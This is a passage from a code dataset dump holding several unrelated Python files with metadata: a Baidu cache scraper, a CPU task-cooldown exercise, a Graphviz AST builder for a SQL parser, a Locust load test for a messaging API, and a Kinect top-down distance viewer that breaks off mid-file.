\"\"\"\n 百度快照链接\n \"\"\"\n headers = {}\n headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n headers['Accept-Encoding'] = 'gzip, deflate'\n headers['Accept-Language'] = 
'zh-CN,zh;q=0.9'\n headers['Cache-Control'] = 'max-age=0'\n headers['Connection'] = 'keep-alive'\n headers['Host'] = 'cache.baiducontent.com'\n headers['Referer'] = 'https://www.baidu.com/s?wd=%E8%AF%9D%20%E9%82%A3%20%E6%8A%95%20%E5%88%B0&pn=0&oq=%E8%AF%9D%20%E9%82%A3%20%E6%8A%95%20%E5%88%B0&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=be9013fd000054dc&rsv_t=d375QQ5FryyawsGUN7O%2FGu1aoVXD9fk18nJRNoygXwbtJh%2BcVCckbsV208CFS9wMhaf%2B'\n headers['Upgrade-Insecure-Requests'] = '1'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n\n def __init__(self, url, keys):\n self.url = url\n self.keys = keys\n return\n\n def request(self, proxy=None):\n if proxy==None:\n res = requests.get(url=self.url, headers=self.headers)\n else:\n res = requests.get(url=self.url, headers=self.headers, proxies=proxy)\n res.encoding = res.apparent_encoding\n return res\n\n def fileter(self, ems, keys):\n def _filter(k):\n res = False\n for i in ems:\n if re.findall(k, i) != []:\n res = True\n return res\n return res\n result = list(map(_filter, keys))\n if sum(result) == len(keys):\n return True\n else:\n return False\n\n def parse(self, text, keys):\n soup = BeautifulSoup(text, 'lxml')\n result = []\n tags = set()\n for tag in soup.find_all('b', style=re.compile('color:black;background-color:.{1,8}')):\n tags.add(tag.parent)\n for tag in tags:\n text = tag.text\n ems = [i.text for i in tag.find_all('b', style=re.compile('color:black;background-color:.{1,8}'))]\n if self.fileter(ems=ems, keys=keys):\n result.append(text)\n return result\n\n def get_text(self, proxy=None):\n res = self.request(proxy=proxy)\n result = self.parse(text=res.text, keys=self.keys)\n return result\n\ndef single_request(query='都是 五 年'):\n main_page = BaiduMainPage(project_name='baidukuaizhao_suanfa_4_grams')\n res = main_page.request(query=query)\n result = main_page.parse(text=res.text)\n return result\n\ndef main_spider(go_on=True):\n project = BaiduMainPage(project_name='baidukuaizhao_suanfa_4_grams')\n # 数据预处理\n if not go_on:\n project.data_preprocess(is_flushdb=True, filename='./data/query.txt')\n # 设置代理ip\n # project.proxy_pool(file_names='../crawler_utils/')\n # 爬虫\n project.request_from_redis(max_step=50000, sleep=2)\n\nif __name__ == '__main__':\n # single_request()\n main_spider(go_on=True)\n # main_spider(go_on=False)\n","sub_path":"baidu/baidukuaizhao/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":9720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"1405148","text":"\"\"\"\nProblem :\nGiven a char array representing tasks CPU need to do.\nIt contains Integers where different integers represent different tasks.\nTasks has to be done in original order.\nEach task could be done in one interval.\nFor each interval, CPU could finish one task or just be idle.\n\nHowever, there is a non-negative cooling interval K that means between two same tasks,\nthere must be at least K intervals that CPU are doing different tasks or just be idle.\n\nYou need to return the total amount of time CPU will take to finish all the given tasks.\n\nExample:\n\nInput: tasks = [\"1\",\"2\",\"1\",\"2\",\"2\",\"1\"], k = 2\nOutput: 9\nExplanation: 1-2-idle-1-2-idle-idle-2-1\n\nDo 1, can't do 1 for 2 turns\nDo 2, can't do 2 for 2 turns\nSaw 1, can't do it ...\n\nstore tasks & the last done time as we encounter\njust add k - (time_now-start_time) to time elasped\n\nSpace: T, being types of 
tasks\nTime: N, being the length of tasks\n-----\nAssuming sequence is the same item, 1, 1, ,1, 1, ...\nresult will be [1, ..K.., 1, ..K.., 1,..]\n\nTry to use less space, if k is low\nOnly need to store the last k items (the things we did the last k steps, plus their insert time)\nUse a deque & set (storing items in the deque)\n--\nIf item in deque, keep popping left & +1 to time\nTotal time is O(n) (store encounter time in the queue)\nTotal space is O(k)\n\"\"\"\n\n\ndef fast(tasks, cd):\n history = dict()\n time = 0\n for t in tasks:\n if t not in history or history[t] + cd < time:\n history[t] = time\n time += 1\n else:\n time += cd - (time - history[t]) + 1\n history[t] = time\n time += 1\n return time\n\n\nimport collections\n\n\"\"\"\n1,1 cd=1\n1,nothing,1\n1,2,1 cd=2\n\nt = 2, 1,2\n1 is inside\nt = 3\nt = 4\n\n1,2,nothing,1\n\"\"\"\n\n\ndef slow(tasks, cd):\n history = collections.deque()\n inside = set()\n time = 0\n for t in tasks:\n while len(history) > cd:\n item = history.popleft()\n if item:\n inside.remove(item)\n\n while t in inside:\n item = history.popleft()\n if item:\n inside.remove(item)\n history.append(None)\n time += 1\n\n history.append(t)\n inside.add(t)\n time += 1\n return time\n\n\ndef better_slow(tasks, cd):\n history = collections.deque()\n inside = set()\n\n curr = 1\n for t in tasks:\n while t in inside:\n val, time = history.popleft()\n inside.remove(val)\n curr = time + cd + 1\n history.append((t, curr))\n inside.add(t)\n curr = curr + 1\n\n while history and history[0][1] < curr - cd:\n val, time = history.popleft()\n inside.remove(val)\n\n while history:\n val, time = history.popleft()\n curr = time\n return curr\n\n\nif __name__ == \"__main__\":\n\n assert fast([1, 2, 1, 2, 2, 1], 2) == 9\n assert slow([1, 2, 1, 2, 2, 1], 2) == 9\n assert better_slow([1, 2, 1, 2, 2, 1], 2) == 9\n","sub_path":"lc_discuss/old/batch1/cpu_problem.py","file_name":"cpu_problem.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"110562418","text":"import ts as TS\nfrom expresiones import *\nfrom instrucciones import *\nfrom graphviz import Digraph\n\ndot = Digraph('AST', node_attr={'shape': 'note','color': 'lightblue2', 'style': 'filled'})\ncontadorNodos = 0\ninstrucciones_Global = []\n\nclass AST: \n\n def __init__(self):\n print('AST')\n\n\n def generarAST(self,instrucciones):\n global contadorNodos, dot, instrucciones_Global\n instrucciones_Global = instrucciones\n dot = Digraph('AST')\n contadorNodos = 2\n dot.node('node1','INIT')\n dot.node('node2','INSTRUCCIONES')\n dot.edge('node1','node2')\n indice = 0\n while indice < len(instrucciones_Global) :\n instruccion = instrucciones_Global[indice]\n if isinstance(instruccion, CreateDatabase):\n self.crearNodoCreateDatabase(\"node2\", instruccion)\n indice = indice +1\n dot.view('reportes/AST', cleanup=True)\n\n def crearNodoCreateDatabase(self, padre, instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'CREATE DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoNombreDatabase(temp1,instruccion)\n self.crearNodoUsuarioDatabase(temp1,instruccion)\n self.crearNodoModoDatabase(temp1,instruccion)\n\n def crearNodoNombreDatabase(self,padre,instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'NOMBRE DATABASE')\n dot.edge(padre, \"node\" + 
str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoExpresion(temp1,instruccion.nombre)\n\n def crearNodoUsuarioDatabase(self,padre,instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'USUARIO DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoExpresion(temp1,instruccion.usuario)\n\n def crearNodoModoDatabase(self,padre,instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'MODO DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoExpresion(temp1,instruccion.modo)\n\n def crearNodoExpresion(self, padre, expresion):\n global contadorNodos, dot\n if isinstance(expresion, ExpresionIdentificador):\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), str(expresion.id))\n dot.edge(padre, \"node\" + str(contadorNodos))\n elif isinstance(expresion, ExpresionNumero):\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), str(expresion.val))\n dot.edge(padre, \"node\" + str(contadorNodos))\n","sub_path":"parser/team15/TytusDB_G15/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"278441821","text":"from locust import HttpLocust, TaskSet, task\nimport random\nimport uuid\nimport json\n\nMIN_WAIT_TIME = 5000\nMAX_WAIT_TIME = 15000\nPATH = '/api/v1.0{0}'\nAPI_KEY = 'api-key'\nMETHODS = ['delete', 'get', 'post', 'put']\n\n\nclass UserAction(TaskSet):\n\n def on_start(self):\n self.sender = \"message-sender\"\n self.payloads = [\n # good payload\n # httpbin\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": self.sender,\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"dummy\",\n \"channel\": \"httpbin\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # africas-talking\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": \"0722000000\",\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"sms\",\n \"channel\": \"africas-talking\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # firebase\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": self.sender,\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"push\",\n \"channel\": \"firebase\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # smpp\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": self.sender,\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"sms\",\n \"channel\": \"smpp\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # bad payload\n {\n \"messageId\": str(uuid.uuid4())\n },\n ]\n\n self.headers = [\n # correct auth headers\n {\n 'Content-type': 'application/json',\n 'Authorization': API_KEY\n },\n # wrong api-key\n {\n 'Content-type': 'application/json',\n 
'Authorization': 'wrong'\n            }\n        ]\n\n    @task(2)\n    def send_message(self):\n        for method in METHODS:\n            payload = self.payloads[random.randint(0, 3)]\n            payload[\"messageId\"] = str(uuid.uuid4())\n            getattr(self.client, method)(\n                PATH.format('/sendMessage'),\n                data=json.dumps(payload),\n                headers=self.headers[random.randint(0, 1)]\n            )\n\n        # make a good request\n        payload = self.payloads[random.randint(0, 3)]\n        payload[\"messageId\"] = str(uuid.uuid4())\n        self.client.post(\n            PATH.format('/sendMessage'),\n            data=json.dumps(payload),\n            headers=self.headers[0]\n        )\n\n    @task(1)\n    def check_health(self):\n        for method in METHODS:\n            getattr(self.client, method)(\n                PATH.format('/checkHealth'),\n                data=json.dumps(self.payloads[random.randint(0, 3)]),\n                headers=self.headers[random.randint(0, 1)]\n            )\n        # make a good request\n        self.client.get(\n            PATH.format('/checkHealth'),\n            headers=self.headers[0]\n        )\n\n\nclass User(HttpLocust):\n    task_set = UserAction\n    min_wait = MIN_WAIT_TIME\n    max_wait = MAX_WAIT_TIME\n","sub_path":"utils/locust/task_set.py","file_name":"task_set.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"632304913","text":"from pykinect2 import PyKinectV2\nfrom pykinect2.PyKinectV2 import *\nfrom pykinect2 import PyKinectRuntime\nimport numpy as np\n\nimport ctypes\nimport _ctypes\nimport pygame\nimport sys\nimport math\nimport time\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport traceback\nimport os\nimport copy\n\nfrom pygame.locals import *\n\n# colors for drawing different bodies \nSKELETON_COLORS = [pygame.color.THECOLORS[\"red\"], \n                   pygame.color.THECOLORS[\"blue\"], \n                   pygame.color.THECOLORS[\"green\"], \n                   pygame.color.THECOLORS[\"orange\"], \n                   pygame.color.THECOLORS[\"purple\"], \n                   pygame.color.THECOLORS[\"yellow\"], \n                   pygame.color.THECOLORS[\"violet\"]]\n\nwhite = (255,255,255)\nblack = (0,0,0)\ngray = (200,200,200)\nred = (255,0,0)\n\n\nclass TopDownViewRuntime(object):\n    def __init__(self):\n        # scale of the top-down view and the color camera preview\n        self.topdown_scale = 1/10\n        self.color_scale = 1/4\n\n        # size of the top-down surface (width, height)\n        self.topdown_surface_size = (1000, 600)\n\n        self.display_pygame = False\n\n\n        self._done = False\n        self._kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Body | PyKinectV2.FrameSourceTypes_Depth)\n        self._bodies = None\n        self.frame = 0\n        self.topdown_position = (20,20)\n        self.new_depth_frame = False\n        self.new_body_frame = False\n\n    \n\n    def draw_color_frame(self, frame, target_surface):\n        target_surface.lock()\n        address = self._kinect.surface_as_array(target_surface.get_buffer())\n        ctypes.memmove(address, frame.ctypes.data, frame.size)\n        del address\n        target_surface.unlock()\n\n    def draw_depth_frame(self, frame, target_surface):\n        if frame is None: # some USB hubs do not provide the infrared image; it works with Kinect Studio though\n            return\n        target_surface.lock()\n        f8=np.uint8(frame.clip(1,4000)/16.)\n        frame8bit=np.dstack((f8,f8,f8))\n        address = self._kinect.surface_as_array(target_surface.get_buffer())\n        ctypes.memmove(address, frame8bit.ctypes.data, frame8bit.size)\n        del address\n        target_surface.unlock()\n\n    def draw_infrared_frame(self, frame, target_surface):\n        if frame is None: # some USB hubs do not provide the infrared image. 
it works with Kinect studio though\n return\n target_surface.lock()\n f8=np.uint8(frame.clip(1,4000)/16.)\n frame8bit=np.dstack((f8,f8,f8))\n address = self._kinect.surface_as_array(target_surface.get_buffer())\n ctypes.memmove(address, frame8bit.ctypes.data, frame8bit.size)\n del address\n target_surface.unlock()\n\n def get_window_size(self):\n return (float(self._kinect.color_frame_desc.Width), float(self._kinect.color_frame_desc.Height))\n\n #convert x,y in frame to x, y irl\n def convert_to_coordinates(self, locations, window_size = None):\n if len(locations) == 0:\n return\n lis = True\n to_return = []\n if type(locations[0]) != list and type(locations[0]) != tuple:\n locations = [locations]\n lis = False\n for location in locations:\n if window_size is None:\n window_size = self.get_window_size()\n horizontal_factor = 1/1000\n vertical_factor = -1/1000\n x, y, depth, _ = location\n width, height = window_size\n horizontal_coordinate = (x-width/2)*depth*horizontal_factor\n vertical_coordinate = (y-height/2)*depth*vertical_factor\n to_return.append([horizontal_coordinate, vertical_coordinate, depth])\n if not lis:\n return to_return[0]\n else:\n return to_return\n\n def convert_to_coordinate(self, location, window_size = None):\n if window_size is None:\n window_size = self.get_window_size()\n horizontal_factor = 1/1000\n vertical_factor = -1/1000\n x, y, depth = location\n width, height = window_size\n horizontal_coordinate = (x-width/2)*depth*horizontal_factor\n vertical_coordinate = (y-height/2)*depth*vertical_factor\n return [horizontal_coordinate, vertical_coordinate, depth]\n\n\n def get_distance(self, location1, location2):\n # print(\"1:\", location1, location1[0:3], \"\\n\",\"2:\", location2 , location2[0:3], \"\\n\")\n x1, y1, z1 = location1[0:3]\n x2, y2, z2 = location2[0:3]\n # print(location1, location2)\n argument = (x1-x2)**2+(y1-y2)**2+(int(z1)-int(z2))**2\n \n if argument < 0:\n # print(location1, location2, (x1-x2)**2,(y1-y2)**2,z1, z2,int(z1)-int(z2), (int(z1)-int(z2))**2, argument)\n # print(\"argument negative\")\n return 0\n return(math.sqrt(argument))\n\n def get_distances(self, location, list_location, return_zero = False):\n to_return = []\n for second_location in list_location:\n d = self.get_distance(location, second_location)\n if d != 0 or return_zero:\n to_return.append(d)\n return to_return\n\n\n def get_key_nearest(self, location, dict):\n if len(dict) > 0 or dict == {}:\n return None\n print(dict, len(dict), dict == {})\n nearest_value = list(dict.values())[0]\n nearest_key = list(dict.keys())[0]\n for key in list(dict.keys()):\n value = dict[key]\n if get_distance(location, dict[key]) < get_distance(location, nearest_value):\n nearest_key = key\n nearest_value = dict[key]\n return nearest_key\n\n def d3_to_d2(self, location):\n return [location[0], location[2]]\n\n def coordinate_to_pixel(self, location, extra = 0):\n return (int(location[0]*self.topdown_scale + self.topdown_surface_size[0]/2 + extra), int(location[2]*self.topdown_scale + extra))\n\n def get_middle(self, location1, location2):\n x1, y1, z1 = location1\n x2, y2, z2 = location2\n return ((x1+x2)/2,(y1+y2)/2,(z1+z2)/2)\n\n def draw_background(self, surface):\n surface.fill(black)\n width, height = surface.get_size()\n pygame.draw.rect(surface, black, ((0,0), (width, height)), 3)\n grid_width = int(width/100)\n grid_height = int(height/100)\n margin = 5\n grid_rectangle_size = 100-margin\n for row in range(grid_height):\n for column in range(grid_width):\n pygame.draw.rect(surface,\n 
white,\n [(margin + grid_rectangle_size) * column + margin/2,\n (margin + grid_rectangle_size) * row + margin/2,\n grid_rectangle_size,\n grid_rectangle_size])\n pygame.draw.line(surface, black, self.coordinate_to_pixel((0,0,0)), self.coordinate_to_pixel((21000, 0, 27000)), 10) \n pygame.draw.line(surface, black, self.coordinate_to_pixel((0,0,0)), self.coordinate_to_pixel((-21000, 0, 27000)), 10) \n\n def get_head_location(self):\n if self._bodies is not None: \n self.head_locations = []\n for i in range(0, self._kinect.max_body_count):\n body = self._bodies.bodies[i]\n if not body.is_tracked: \n continue \n joints = body.joints \n joint_points = self._kinect.body_joints_to_color_space(joints)\n joint_points_depth = self._kinect.body_joints_to_depth_space(joints)\n\n if self.new_body_frame and self.new_depth_frame:\n try:\n head_joint = joint_points[PyKinectV2.JointType_Head]\n head_joint_depth = joint_points_depth[PyKinectV2.JointType_Head]\n depth_value = self.depth_frame[int(head_joint_depth.y), int(head_joint_depth.x)]\n if depth_value != 0:\n self.head_locations.append([head_joint.x, head_joint.y, depth_value])\n # print(\"depth coordinate: \",int(head_joint_depth.y), int(head_joint_depth.x), \"/color coordinate:\", int(head_joint.x), int(head_joint.y))\n except Exception as e:\n if \"infinity\" not in str(e):\n print(\"error before return:\", e)\n\n def draw_heads(self):\n combos = []\n # print(self.head_locations)\n head_coordinates = self.convert_to_coordinates(self.head_locations)\n text_surfaces_to_draw = []\n too_close = 0\n for head in self.head_locations:\n coordinate = self.convert_to_coordinates(head)\n # print(head_coordinates, self.get_distances(coordinate, head_coordinates))\n try:\n nearest = min(self.get_distances(coordinate, head_coordinates))\n except Exception as e:\n nearest = 3000\n # print(e, head_coordinates, self.get_distances(coordinate, head_coordinates))\n if nearest > 1500:\n # print(nearest)\n circle_color = (100, 200, 100)\n else:\n circle_color = (255, 0, 0)\n too_close += 1\n radius = int(750*self.topdown_scale)\n\n for second_head in self.head_locations:\n if second_head != head:\n \n if ([head, second_head] not in combos) and ([second_head, head] not in combos):\n second_coordinate = self.convert_to_coordinates(second_head)\n distance = self.get_distance(coordinate, second_coordinate)\n \n \n pygame.draw.line(self.topdown_surface, (255, 0, 0), self.coordinate_to_pixel(coordinate), self.coordinate_to_pixel(second_coordinate), 5)\n if distance > 0:\n textsurface = self.myfont.render(str(round(distance/1000, 1)).replace(\".\",\",\")+\" m\", False, (0, 0, 255))\n text_coordinate = self.coordinate_to_pixel(self.get_middle(coordinate, second_coordinate))\n \n text_surfaces_to_draw.append([textsurface, text_coordinate])\n combos.append([head, second_head])\n # if distance < 1500:\n # circle_color = (255,0,0)\n\n pygame.draw.circle(self.topdown_surface, circle_color, self.coordinate_to_pixel(coordinate), radius, 3)\n pygame.draw.circle(self.topdown_surface, circle_color, self.coordinate_to_pixel(coordinate), 20)\n\n textsurface = self.myfont.render(str(head[3]), False, (0, 0, 255))\n text_coordinate = self.coordinate_to_pixel(coordinate) \n text_surfaces_to_draw.append([textsurface, text_coordinate])\n\n for textsurface, text_coordinate in text_surfaces_to_draw:\n pygame.draw.rect(self.topdown_surface, gray, ((text_coordinate[0]-5, text_coordinate[1]-5), (textsurface.get_size()[0]+10, textsurface.get_size()[1]+10)))\n pygame.draw.rect(self.topdown_surface, 
black, ((text_coordinate[0]-5, text_coordinate[1]-5), (textsurface.get_size()[0]+10, textsurface.get_size()[1]+10)), 3)\n self.topdown_surface.blit(textsurface, text_coordinate)\n\n def get_position_from_frame(self, frame_coordinate):\n frame_x, frame_y = frame_coordinate\n depth = self._kinect._mapper.MapCameraPointToDepthSpace(frame_coordinate) \n print(frame_x, frame_y, depth)\n\n\n def d3d_map(self):\n # http://archive.petercollingridge.co.uk/book/export/html/460\n self.show_color_pixel = False\n\n pygame.init()\n factor = 2\n zoom_factor = 2\n self.screen = pygame.display.set_mode((192*factor*2,108*factor*2+192*factor), pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self.color_surface = pygame.Surface((1920, 1080), 0, 32)\n self.depth_surface = pygame.Surface((self._kinect.depth_frame_desc.Width, self._kinect.depth_frame_desc.Height), 0, 24)\n self.node_surface = pygame.Surface((1000*zoom_factor, 1000*zoom_factor), 0, 32)\n frame = 0\n got_frame = False\n begin_time = time.time()\n\n self.debug_time = {\"mapping\": 0, \"transforming\": 0, \"displaying\": 0, \"new_mapping\": 0}\n self.status = {\"offset\": [630*zoom_factor,-440*zoom_factor], \"scaling_factor\": 1, \"rotate\": [0,0,0]}\n\n step = 2\n width, height = 512, 424\n n_width, n_height = int(width / step), int(height / step)\n c_width, c_height = n_width * step, n_height * step\n x_coordinates = np.repeat(np.arange(0, c_width, step), n_height).reshape(n_height, n_width, order='F').ravel()\n y_coordinates = np.repeat(np.arange(0, c_width, step), n_height)\n\n while True:\n if got_frame:\n frame += 1\n if frame == 1:\n begin_time = time.time()\n if self._kinect.has_new_color_frame(): \n color_frame = self._kinect.get_last_color_frame()\n self.draw_color_frame(color_frame, self.color_surface)\n got_frame = True\n passed_time = time.time()-begin_time\n print(\"frame\", frame, round(passed_time, 2), round(frame/passed_time, 2))\n if self._kinect.has_new_depth_frame():\n depth_frame_og = self._kinect.get_last_depth_frame()\n depth_frame = depth_frame_og.reshape(424,512)\n self.draw_infrared_frame(depth_frame, self.depth_surface)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT: self.status[\"offset\"][0] += 50*zoom_factor\n if event.key == pygame.K_RIGHT: self.status[\"offset\"][0] -= 50*zoom_factor\n if event.key == pygame.K_DOWN: self.status[\"offset\"][1] += 50*zoom_factor\n if event.key == pygame.K_UP: self.status[\"offset\"][1] -= 50*zoom_factor\n if event.key == pygame.K_EQUALS: self.status[\"scaling_factor\"] += 0.5\n if event.key == pygame.K_MINUS: self.status[\"scaling_factor\"] -= 0.5\n if event.key == pygame.K_q: self.status[\"rotate\"][0] += math.pi/8 #a\n if event.key == pygame.K_a: self.status[\"rotate\"][0] -= math.pi/8 #q\n if event.key == pygame.K_w: self.status[\"rotate\"][1] += math.pi/8 #z\n if event.key == pygame.K_s: self.status[\"rotate\"][1] -= math.pi/8\n if event.key == pygame.K_e: self.status[\"rotate\"][2] += math.pi/8\n if event.key == pygame.K_d: self.status[\"rotate\"][2] -= math.pi/8\n print(event.key, self.status)\n \n if frame >= 1:\n color_list = []\n\n map_time = time.time()\n\n z = depth_frame[0:c_height:step, 0:c_width:step].flatten()\n x_transformed = (x_coordinates - width / 2) * z / 1000\n y_transformed = -(y_coordinates - height / 2) * z / 1000\n xyz = np.c_[x_transformed, y_transformed, z / 4]\n\n self.debug_time[\"new_mapping\"] += time.time() - map_time\n\n\n\n self.nodes 
= np.array(xyz)\n self.nodes = np.hstack((self.nodes, np.ones((len(self.nodes), 1))))\n\n transformation_matrices = []\n transform_time = time.time()\n\n # rotateXMatrix\n c = np.cos(self.status[\"rotate\"][0])\n s = np.sin(self.status[\"rotate\"][0])\n transformation_matrices.append(np.array([[1, 0, 0, 0],\n [0, c,-s, 0],\n [0, s, c, 0],\n [0, 0, 0, 1]]))\n\n # rotateYMatrix\n c = np.cos(self.status[\"rotate\"][1])\n s = np.sin(self.status[\"rotate\"][1])\n transformation_matrices.append(np.array([[ c, 0, s, 0],\n [ 0, 1, 0, 0],\n [-s, 0, c, 0],\n [ 0, 0, 0, 1]]))\n\n # rotateZMatrix\n c = np.cos(self.status[\"rotate\"][2])\n s = np.sin(self.status[\"rotate\"][2])\n transformation_matrices.append(np.array([[c,-s, 0, 0],\n [s, c, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]))\n\n # scaling\n s = (self.status[\"scaling_factor\"], )*3\n transformation_matrices.append(np.array([[s[0], 0, 0, 0],\n [0, s[1], 0, 0],\n [0, 0, s[2], 0],\n [0, 0, 0, 1]]))\n\n # translation\n transformation_matrices.append(np.array([[1, 0, 0,0],\n [0, 1, 0,0],\n [0, 0, 1,0],\n [self.status[\"offset\"][0], self.status[\"offset\"][1], 0,1]]))\n\n for transform in transformation_matrices:\n self.nodes = np.dot(self.nodes, transform)\n\n self.debug_time[\"transforming\"] += time.time() - transform_time\n\n\n display_time = time.time()\n\n self.node_surface.fill(black)\n color_to_draw = (white)\n\n for index, node in enumerate(self.nodes):\n if self.show_color_pixel: color_to_draw = color_list[index]\n pygame.draw.circle(self.node_surface, color_to_draw, (int(node[0]), -int(node[1])), 2, 0)\n\n self.debug_time[\"displaying\"] += time.time()-display_time\n\n \n self.color_surface_to_draw = pygame.transform.scale(self.color_surface, (192*factor,108*factor));\n self.depth_surface_to_draw = pygame.transform.scale(self.depth_surface, (192*factor,108*factor));\n self.node_surface_to_draw = pygame.transform.scale(self.node_surface, (192*factor*2,192*factor*2));\n self.screen.blit(self.color_surface_to_draw, (0,0))\n self.screen.blit(self.depth_surface_to_draw, (192*factor,0))\n self.screen.blit(self.node_surface_to_draw, (0,108*factor))\n\n pygame.display.update()\n pygame.display.flip()\n\n if frame > 200:\n print(dict([(key, self.debug_time[key] / (time.time()-begin_time)) for key in self.debug_time.keys()]))\n break\n\n\n\n \n\n def color_and_depth_interface(self):\n pygame.init()\n factor = 4\n self.screen = pygame.display.set_mode((192*factor*2,108*factor), pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self.color_surface = pygame.Surface((1920, 1080), 0, 32)\n # self.depth_surface = pygame.Surface((424, 512), 0, 32)\n self.depth_surface = pygame.Surface((self._kinect.depth_frame_desc.Width, self._kinect.depth_frame_desc.Height), 0, 24)\n print(\"depth size\", (self._kinect.depth_frame_desc.Width, self._kinect.depth_frame_desc.Height), \"color size\", (self._kinect.color_frame_desc.Width, self._kinect.color_frame_desc.Height))\n while True:\n if self._kinect.has_new_color_frame():\n color_frame = self._kinect.get_last_color_frame()\n self.draw_color_frame(color_frame, self.color_surface)\n\n if self._kinect.has_new_depth_frame():\n depth_frame = self._kinect.get_last_depth_frame()\n self.draw_infrared_frame(depth_frame, self.depth_surface)\n\n self.color_surface_to_draw = pygame.transform.scale(self.color_surface, (192*factor,108*factor));\n self.depth_surface_to_draw = pygame.transform.scale(self.depth_surface, (192*factor,108*factor));\n self.screen.blit(self.color_surface_to_draw, (0,0))\n 
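# NOTE: both previews are scaled to the same 192*factor by 108*factor\n            # (16:9) size before blitting; the depth stream is 512x424, so its\n            # aspect ratio is stretched to match the color preview here.\n            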
self.screen.blit(self.depth_surface_to_draw, (192*factor,0))\n\n pygame.display.update()\n pygame.display.flip()\n\n\n def draw_foreground(self):\n self._screen.blit(self.topdown_surface, self.topdown_position)\n\n h_to_w = float(self.color_surface.get_height()) / self.color_surface.get_width()\n target_height = int((h_to_w * self._screen.get_width())*self.color_scale)\n surface_to_draw = pygame.transform.scale(self.color_surface, (int(self._screen.get_width()*self.color_scale), target_height));\n color_position = (self.topdown_position[0] + self.topdown_surface.get_size()[0] + 20, self.topdown_position[1])\n self._screen.blit(surface_to_draw, color_position)\n info_position = (color_position[0], color_position[1]+surface_to_draw.get_size()[1]+20)\n self.info_surface = pygame.transform.scale(self.info_surface, (surface_to_draw.get_size()[0], self.topdown_surface.get_size()[1]-surface_to_draw.get_size()[1]-20))\n self.info_surface.fill(white)\n pygame.draw.rect(self.info_surface, black, ((0,0), self.info_surface.get_size()), 5)\n self._screen.blit(self.info_surface, info_position)\n\n pygame.display.update()\n pygame.display.flip()\n\n\n def retrieve_data(self, draw = True):\n if (self.sensor and self._kinect.has_new_color_frame()) or (not self.sensor and self.frame_name in self.color_files):\n if self.sensor:\n self.color_frame = self._kinect.get_last_color_frame()\n else:\n self.color_frame = np.load(self.folder_path+\"color/\"+self.frame_name)\n\n\n self.draw_color_frame(self.color_frame, self.color_surface)\n pygame.draw.rect(self.color_surface, black, ((0,0), self.color_surface.get_size()), 80)\n\n if self.record: np.save(self.folder_path+\"/color/frame_\"+str(self.frame), self.color_frame)\n \n if (self.sensor and self._kinect.has_new_body_frame()): \n self._bodies = self._kinect.get_last_body_frame()\n self.new_body_frame = True\n\n if (self.sensor and self._kinect.has_new_depth_frame()) or (not self.sensor and self.frame_name in self.depth_files):\n if self.sensor:\n self.depth_frame = self._kinect.get_last_depth_frame()\n else:\n self.depth_frame = np.load(self.folder_path+\"depth/\"+self.frame_name)\n\n if self.record: 